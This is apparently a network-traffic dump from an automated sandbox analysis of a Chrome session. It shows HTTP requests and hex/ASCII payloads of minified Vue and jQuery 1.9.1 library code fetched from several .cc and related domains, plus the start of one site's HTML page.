                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 71 75 69 72 65 64 20 70 72 6f 70 3a 20 22 27 2b 65 2b 27 22 27 2c 72 29 3b 69 66 28 6e 75 6c 6c 21 3d 6e 7c 7c 74 2e 72 65 71 75 69 72 65 64 29 7b 76 61 72 20 6f 3d 74 2e 74 79 70 65 2c 61 3d 21 6f 7c 7c 21 30 3d 3d 3d 6f 2c 75 3d 5b 5d 3b 69 66 28 6f 29 7b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6f 29 7c 7c 28 6f 3d 5b 6f 5d 29 3b 66 6f 72 28 76 61 72 20 73 3d 30 3b 73 3c 6f 2e 6c 65 6e 67 74 68 26 26 21 61 3b 73 2b 2b 29 7b 76 61 72 20 63 3d 61 74 28 6e 2c 6f 5b 73 5d 29 3b 75 2e 70 75 73 68 28 63 2e 65 78 70 65 63 74 65 64 54 79 70 65 7c 7c 22 22 29 2c 61 3d 63 2e 76 61 6c 69 64 7d 7d 69 66 28 21 61 29 72 65 74 75 72 6e 20 76 6f 69 64 20 69 61 28 27 49 6e 76 61 6c 69 64 20 70 72 6f 70 3a 20 74 79 70 65 20 63 68 65 63 6b 20 66 61 69 6c 65 64 20 66 6f
                                                                                                                                                          Data Ascii: quired prop: "'+e+'"',r);if(null!=n||t.required){var o=t.type,a=!o||!0===o,u=[];if(o){Array.isArray(o)||(o=[o]);for(var s=0;s<o.length&&!a;s++){var c=at(n,o[s]);u.push(c.expectedType||""),a=c.valid}}if(!a)return void ia('Invalid prop: type check failed fo
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 6e 2c 69 29 7b 76 61 72 20 61 3d 53 65 28 6f 2c 74 2c 65 2c 6e 2c 69 2c 63 29 3b 72 65 74 75 72 6e 20 61 26 26 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 26 26 28 61 2e 66 6e 53 63 6f 70 65 49 64 3d 75 2e 5f 73 63 6f 70 65 49 64 2c 61 2e 66 6e 43 6f 6e 74 65 78 74 3d 72 29 2c 61 7d 3a 74 68 69 73 2e 5f 63 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 53 65 28 6f 2c 74 2c 65 2c 6e 2c 72 2c 63 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 74 2c 65 2c 6e 2c 72 2c 69 29 7b 76 61 72 20 61 3d 74 2e 6f 70 74 69 6f 6e 73 2c 75 3d 7b 7d 2c 73 3d 61 2e 70 72 6f 70 73 3b 69 66 28 6f 28 73 29 29 66 6f 72 28 76 61 72 20 63 20 69 6e 20 73 29 75 5b 63 5d 3d 72 74 28 63 2c 73 2c 65 7c 7c 78 6f 29 3b 65 6c 73 65 20 6f 28 6e 2e 61 74
                                                                                                                                                          Data Ascii: n,i){var a=Se(o,t,e,n,i,c);return a&&!Array.isArray(a)&&(a.fnScopeId=u._scopeId,a.fnContext=r),a}:this._c=function(t,e,n,r){return Se(o,t,e,n,r,c)}}function $e(t,e,n,r,i){var a=t.options,u={},s=a.props;if(o(s))for(var c in s)u[c]=rt(c,s,e||xo);else o(n.at
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 22 20 63 6f 6e 66 6c 69 63 74 73 20 77 69 74 68 20 76 2d 6d 6f 64 65 6c 20 6f 6e 20 74 68 65 20 73 61 6d 65 20 65 6c 65 6d 65 6e 74 20 62 65 63 61 75 73 65 20 74 68 65 20 6c 61 74 74 65 72 20 61 6c 72 65 61 64 79 20 65 78 70 61 6e 64 73 20 74 6f 20 61 20 76 61 6c 75 65 20 62 69 6e 64 69 6e 67 20 69 6e 74 65 72 6e 61 6c 6c 79 27 29 7d 7d 76 61 72 20 73 3d 72 7c 7c 7b 7d 2c 63 3d 73 2e 6c 61 7a 79 2c 6c 3d 73 2e 6e 75 6d 62 65 72 2c 66 3d 73 2e 74 72 69 6d 2c 70 3d 21 63 26 26 22 72 61 6e 67 65 22 21 3d 3d 69 2c 64 3d 63 3f 22 63 68 61 6e 67 65 22 3a 22 72 61 6e 67 65 22 3d 3d 3d 69 3f 4b 75 3a 22 69 6e 70 75 74 22 2c 68 3d 22 24 65 76 65 6e 74 2e 74 61 72 67 65 74 2e 76 61 6c 75 65 22 3b 66 26 26 28 68 3d 22 24 65 76 65 6e 74 2e 74 61 72 67 65 74 2e 76 61
                                                                                                                                                          Data Ascii: " conflicts with v-model on the same element because the latter already expands to a value binding internally')}}var s=r||{},c=s.lazy,l=s.number,f=s.trim,p=!c&&"range"!==i,d=c?"change":"range"===i?Ku:"input",h="$event.target.value";f&&(h="$event.target.va
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 6f 6e 64 69 6e 67 20 76 2d 69 66 2e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 64 69 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 65 2e 6c 65 6e 67 74 68 3b 6e 2d 2d 3b 29 7b 69 66 28 31 3d 3d 3d 65 5b 6e 5d 2e 74 79 70 65 29 72 65 74 75 72 6e 20 65 5b 6e 5d 3b 22 70 72 6f 64 75 63 74 69 6f 6e 22 21 3d 3d 74 2e 65 6e 76 2e 4e 4f 44 45 5f 45 4e 56 26 26 22 20 22 21 3d 3d 65 5b 6e 5d 2e 74 65 78 74 26 26 47 73 28 27 74 65 78 74 20 22 27 2b 65 5b 6e 5d 2e 74 65 78 74 2e 74 72 69 6d 28 29 2b 27 22 20 62 65 74 77 65 65 6e 20 76 2d 69 66 20 61 6e 64 20 76 2d 65 6c 73 65 28 2d 69 66 29 20 77 69 6c 6c 20 62 65 20 69 67 6e 6f 72 65 64 2e 27 29 2c 65 2e 70 6f 70 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 68 69 28 74 2c 65 29 7b 74 2e 69 66 43 6f 6e 64 69 74 69 6f 6e 73 7c 7c 28
                                                                                                                                                          Data Ascii: onding v-if.")}function di(e){for(var n=e.length;n--;){if(1===e[n].type)return e[n];"production"!==t.env.NODE_ENV&&" "!==e[n].text&&Gs('text "'+e[n].text.trim()+'" between v-if and v-else(-if) will be ignored.'),e.pop()}}function hi(t,e){t.ifConditions||(
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 2c 74 61 2c 65 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 51 6f 26 26 28 51 6f 3d 21 50 6f 26 26 21 7a 6f 26 26 76 6f 69 64 20 30 21 3d 3d 6e 26 26 22 73 65 72 76 65 72 22 3d 3d 3d 6e 2e 70 72 6f 63 65 73 73 2e 65 6e 76 2e 56 55 45 5f 45 4e 56 29 2c 51 6f 7d 2c 6e 61 3d 50 6f 26 26 77 69 6e 64 6f 77 2e 5f 5f 56 55 45 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2c 72 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 28 53 79 6d 62 6f 6c 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 26 26 53 28 52 65 66 6c 65 63 74 2e 6f 77 6e 4b 65 79 73 29 3b 74 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65
                                                                                                                                                          Data Ascii: ,ta,ea=function(){return void 0===Qo&&(Qo=!Po&&!zo&&void 0!==n&&"server"===n.process.env.VUE_ENV),Qo},na=Po&&window.__VUE_DEVTOOLS_GLOBAL_HOOK__,ra="undefined"!=typeof Symbol&&S(Symbol)&&"undefined"!=typeof Reflect&&S(Reflect.ownKeys);ta="undefined"!=type
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 74 2c 70 61 72 61 6d 2c 73 6f 75 72 63 65 2c 63 61 6e 76 61 73 2c 73 63 72 69 70 74 2c 6e 6f 73 63 72 69 70 74 2c 64 65 6c 2c 69 6e 73 2c 63 61 70 74 69 6f 6e 2c 63 6f 6c 2c 63 6f 6c 67 72 6f 75 70 2c 74 61 62 6c 65 2c 74 68 65 61 64 2c 74 62 6f 64 79 2c 74 64 2c 74 68 2c 74 72 2c 62 75 74 74 6f 6e 2c 64 61 74 61 6c 69 73 74 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 69 6e 70 75 74 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 6d 65 74 65 72 2c 6f 70 74 67 72 6f 75 70 2c 6f 70 74 69 6f 6e 2c 6f 75 74 70 75 74 2c 70 72 6f 67 72 65 73 73 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 64 65 74 61 69 6c 73 2c 64 69 61 6c 6f 67 2c 6d 65 6e 75 2c 6d 65 6e 75 69 74 65 6d 2c 73 75 6d 6d 61 72 79 2c 63 6f 6e 74 65 6e 74 2c 65 6c 65 6d 65 6e 74 2c 73 68 61 64 6f
                                                                                                                                                          Data Ascii: t,param,source,canvas,script,noscript,del,ins,caption,col,colgroup,table,thead,tbody,td,th,tr,button,datalist,fieldset,form,input,label,legend,meter,optgroup,option,output,progress,select,textarea,details,dialog,menu,menuitem,summary,content,element,shado
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 69 2c 59 73 3d 2f 5e 3c 21 5c 2d 2d 2f 2c 57 73 3d 2f 5e 3c 21 5c 5b 2f 2c 5a 73 3d 21 31 3b 22 78 22 2e 72 65 70 6c 61 63 65 28 2f 78 28 2e 29 3f 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 5a 73 3d 22 22 3d 3d 3d 65 7d 29 3b 76 61 72 20 47 73 2c 4b 73 2c 4a 73 2c 58 73 2c 51 73 2c 74 63 2c 65 63 2c 6e 63 2c 72 63 2c 69 63 2c 6f 63 2c 61 63 3d 6d 28 22 73 63 72 69 70 74 2c 73 74 79 6c 65 2c 74 65 78 74 61 72 65 61 22 2c 21 30 29 2c 75 63 3d 7b 7d 2c 73 63 3d 7b 22 26 6c 74 3b 22 3a 22 3c 22 2c 22 26 67 74 3b 22 3a 22 3e 22 2c 22 26 71 75 6f 74 3b 22 3a 27 22 27 2c 22 26 61 6d 70 3b 22 3a 22 26 22 2c 22 26 23 31 30 3b 22 3a 22 5c 6e 22 2c 22 26 23 39 3b 22 3a 22 5c 74 22 7d 2c 63 63 3d 2f 26 28 3f 3a 6c 74 7c 67 74 7c 71 75 6f 74 7c 61 6d 70 29 3b
                                                                                                                                                          Data Ascii: i,Ys=/^<!\--/,Ws=/^<!\[/,Zs=!1;"x".replace(/x(.)?/g,function(t,e){Zs=""===e});var Gs,Ks,Js,Xs,Qs,tc,ec,nc,rc,ic,oc,ac=m("script,style,textarea",!0),uc={},sc={"&lt;":"<","&gt;":">","&quot;":'"',"&amp;":"&","&#10;":"\n","&#9;":"\t"},cc=/&(?:lt|gt|quot|amp);
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 6d 75 74 61 74 69 6f 6e 20 74 79 70 65 3a 20 22 2b 61 2b 22 2e 20 53 69 6c 65 6e 74 20 6f 70 74 69 6f 6e 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2e 20 55 73 65 20 74 68 65 20 66 69 6c 74 65 72 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 69 6e 20 74 68 65 20 76 75 65 2d 64 65 76 74 6f 6f 6c 73 22 29 7d 2c 56 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 70 61 74 63 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 69 3d 78 28 65 2c 6e 29 2c 6f 3d 69 2e 74 79 70 65 2c 61 3d 69 2e 70 61 79 6c 6f 61 64 2c 75 3d 7b 74 79 70 65 3a 6f 2c 70 61 79 6c 6f 61 64 3a 61 7d 2c 73 3d 74 68 69 73 2e 5f 61 63 74 69 6f 6e 73 5b 6f 5d 3b 72 65 74 75 72 6e 20 73 3f 28 74 68 69 73 2e 5f 61 63 74 69 6f 6e 53 75 62 73 63 72 69 62 65 72 73
                                                                                                                                                          Data Ascii: mutation type: "+a+". Silent option has been removed. Use the filter functionality in the vue-devtools")},V.prototype.dispatch=function(e,n){var r=this,i=x(e,n),o=i.type,a=i.payload,u={type:o,payload:a},s=this._actions[o];return s?(this._actionSubscribers
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 7b 78 3a 69 2e 6c 65 66 74 2d 72 2e 6c 65 66 74 2d 65 2e 78 2c 79 3a 69 2e 74 6f 70 2d 72 2e 74 6f 70 2d 65 2e 79 7d 7d 66 75 6e 63 74 69 6f 6e 20 51 28 74 29 7b 72 65 74 75 72 6e 20 6e 74 28 74 2e 78 29 7c 7c 6e 74 28 74 2e 79 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 74 29 7b 72 65 74 75 72 6e 7b 78 3a 6e 74 28 74 2e 78 29 3f 74 2e 78 3a 77 69 6e 64 6f 77 2e 70 61 67 65 58 4f 66 66 73 65 74 2c 79 3a 6e 74 28 74 2e 79 29 3f 74 2e 79 3a 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 74 29 7b 72 65 74 75 72 6e 7b 78 3a 6e 74 28 74 2e 78 29 3f 74 2e 78 3a 30 2c 79 3a 6e 74 28 74 2e 79 29 3f 74 2e 79 3a 30 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 74 29 7b 72
                                                                                                                                                          Data Ascii: ientRect();return{x:i.left-r.left-e.x,y:i.top-r.top-e.y}}function Q(t){return nt(t.x)||nt(t.y)}function tt(t){return{x:nt(t.x)?t.x:window.pageXOffset,y:nt(t.y)?t.y:window.pageYOffset}}function et(t){return{x:nt(t.x)?t.x:0,y:nt(t.y)?t.y:0}}function nt(t){r


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          239192.168.2.54998990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC538OUTGET /pc/lib/jquery.min-1.9.1.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:01 UTC641INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 92630
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 31 Jan 2018 01:18:42 GMT
                                                                                                                                                          ETag: "5a711972-169d6"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[10],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,8],EU-GER-frankfurt-GLOBAL1-CACHE7[22],EU-GER-frankfurt-GLOBAL1-CACHE14[0,TCP_HIT,16],1.1 google
                                                                                                                                                          X-CCDN-Expires: 531511
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 4f55d786994d1c39beb65d716ec13665
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2060489
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:01 UTC15743INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 39 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 32 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 2f 2f 40 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 6a 71 75 65 72 79 2e 6d 69 6e 2e 6d 61 70 0a 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 3d 74 79 70 65 6f 66 20 74 2c 6f 3d 65 2e 64 6f 63 75 6d 65 6e 74 2c 61 3d 65 2e 6c 6f 63 61 74 69 6f 6e 2c 73 3d 65 2e 6a 51 75 65 72 79 2c 75 3d 65 2e 24 2c 6c 3d 7b 7d 2c 63 3d 5b 5d 2c 70 3d 22 31 2e 39 2e 31 22 2c 66 3d 63 2e 63 6f 6e 63 61 74 2c 64 3d 63 2e 70 75 73 68 2c 68 3d 63 2e 73 6c 69 63 65 2c 67 3d 63 2e 69 6e 64 65 78 4f
                                                                                                                                                          Data Ascii: /*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license//@ sourceMappingURL=jquery.min.map*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexO
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 74 79 70 65 6f 66 20 65 3f 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 64 61 74 61 28 74 68 69 73 2c 65 29 7d 29 3a 62 2e 61 63 63 65 73 73 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 74 3f 6f 3f 57 28 6f 2c 65 2c 62 2e 64 61 74 61 28 6f 2c 65 29 29 3a 6e 75 6c 6c 3a 28 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 64 61 74 61 28 74 68 69 73 2c 65 2c 6e 29 7d 29 2c 74 29 7d 2c 6e 75 6c 6c 2c 6e 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 2c 6e 75 6c 6c 2c 21 30 29 7d 2c 72 65 6d 6f 76 65 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 72 65 6d 6f 76 65 44 61 74
                                                                                                                                                          Data Ascii: typeof e?this.each(function(){b.data(this,e)}):b.access(this,function(n){return n===t?o?W(o,e,b.data(o,e)):null:(this.each(function(){b.data(this,e,n)}),t)},null,n,arguments.length>1,null,!0)},removeData:function(e){return this.each(function(){b.removeDat
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 3a 74 2c 62 69 6e 64 54 79 70 65 3a 74 2c 68 61 6e 64 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 72 3d 74 68 69 73 2c 69 3d 65 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 2c 6f 3d 65 2e 68 61 6e 64 6c 65 4f 62 6a 3b 0a 72 65 74 75 72 6e 28 21 69 7c 7c 69 21 3d 3d 72 26 26 21 62 2e 63 6f 6e 74 61 69 6e 73 28 72 2c 69 29 29 26 26 28 65 2e 74 79 70 65 3d 6f 2e 6f 72 69 67 54 79 70 65 2c 6e 3d 6f 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 65 2e 74 79 70 65 3d 74 29 2c 6e 7d 7d 7d 29 2c 62 2e 73 75 70 70 6f 72 74 2e 73 75 62 6d 69 74 42 75 62 62 6c 65 73 7c 7c 28 62 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2e 73 75 62 6d 69 74 3d 7b 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                                                                                                          Data Ascii: :t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return(!i||i!==r&&!b.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),b.support.submitBubbles||(b.event.special.submit={setup:function(){ret
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 2c 65 76 65 6e 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 30 3b 66 6f 72 28 3b 74 3e 6e 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6f 64 64 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 31 3b 66 6f 72 28 3b 74 3e 6e 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6c 74 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 30 3e 6e 3f 6e 2b 74 3a 6e 3b 66 6f 72 28 3b 2d 2d 72 3e 3d 30 3b 29 65 2e 70 75 73 68 28 72 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 67 74 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 30 3e 6e 3f 6e 2b 74 3a 6e 3b 66 6f 72 28 3b 74 3e 2b 2b 72 3b 29 65 2e 70
                                                                                                                                                          Data Ascii: ,even:pt(function(e,t){var n=0;for(;t>n;n+=2)e.push(n);return e}),odd:pt(function(e,t){var n=1;for(;t>n;n+=2)e.push(n);return e}),lt:pt(function(e,t,n){var r=0>n?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:pt(function(e,t,n){var r=0>n?n+t:n;for(;t>++r;)e.p
                                                                                                                                                          2024-06-09 22:41:02 UTC16384INData Raw: 5b 6f 5d 2c 70 3f 64 65 6c 65 74 65 20 6e 5b 75 5d 3a 74 79 70 65 6f 66 20 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 21 3d 3d 69 3f 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 75 29 3a 6e 5b 75 5d 3d 6e 75 6c 6c 2c 63 2e 70 75 73 68 28 6f 29 29 7d 7d 7d 29 3b 76 61 72 20 50 74 2c 52 74 2c 57 74 2c 24 74 3d 2f 61 6c 70 68 61 5c 28 5b 5e 29 5d 2a 5c 29 2f 69 2c 49 74 3d 2f 6f 70 61 63 69 74 79 5c 73 2a 3d 5c 73 2a 28 5b 5e 29 5d 2a 29 2f 2c 7a 74 3d 2f 5e 28 74 6f 70 7c 72 69 67 68 74 7c 62 6f 74 74 6f 6d 7c 6c 65 66 74 29 24 2f 2c 58 74 3d 2f 5e 28 6e 6f 6e 65 7c 74 61 62 6c 65 28 3f 21 2d 63 5b 65 61 5d 29 2e 2b 29 2f 2c 55 74 3d 2f 5e 6d 61 72 67 69 6e 2f 2c 56 74 3d 52 65 67 45 78 70 28 22 5e 28 22 2b 78 2b 22 29 28 2e 2a 29 24 22 2c
                                                                                                                                                          Data Ascii: [o],p?delete n[u]:typeof n.removeAttribute!==i?n.removeAttribute(u):n[u]=null,c.push(o))}}});var Pt,Rt,Wt,$t=/alpha\([^)]*\)/i,It=/opacity\s*=\s*([^)]*)/,zt=/^(top|right|bottom|left)$/,Xt=/^(none|table(?!-c[ea]).+)/,Ut=/^margin/,Vt=RegExp("^("+x+")(.*)$",
                                                                                                                                                          2024-06-09 22:41:02 UTC11351INData Raw: 6f 6e 20 49 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 7d 63 61 74 63 68 28 74 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 7a 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 7d 62 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 3d 65 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 74 68 69 73 2e 69 73 4c 6f 63 61 6c 26 26 49 6e 28 29 7c 7c 7a 6e 28 29 7d 3a 49 6e 2c 52 6e 3d 62 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 28 29 2c 62 2e 73 75 70 70 6f 72 74 2e 63 6f 72 73 3d 21 21 52 6e 26 26
                                                                                                                                                          Data Ascii: on In(){try{return new e.XMLHttpRequest}catch(t){}}function zn(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}b.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&In()||zn()}:In,Rn=b.ajaxSettings.xhr(),b.support.cors=!!Rn&&


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          240192.168.2.549987202.61.87.2194434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:01 UTC632OUTGET / HTTP/1.1
                                                                                                                                                          Host: yh8613.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:02 UTC407INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:01 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 48883
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Last-Modified: Tue, 06 Jun 2023 07:31:39 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          ETag: "647ee0db-bef3"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: EXPIRED
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:02 UTC15977INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 6c 63 6f 6d 65 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65
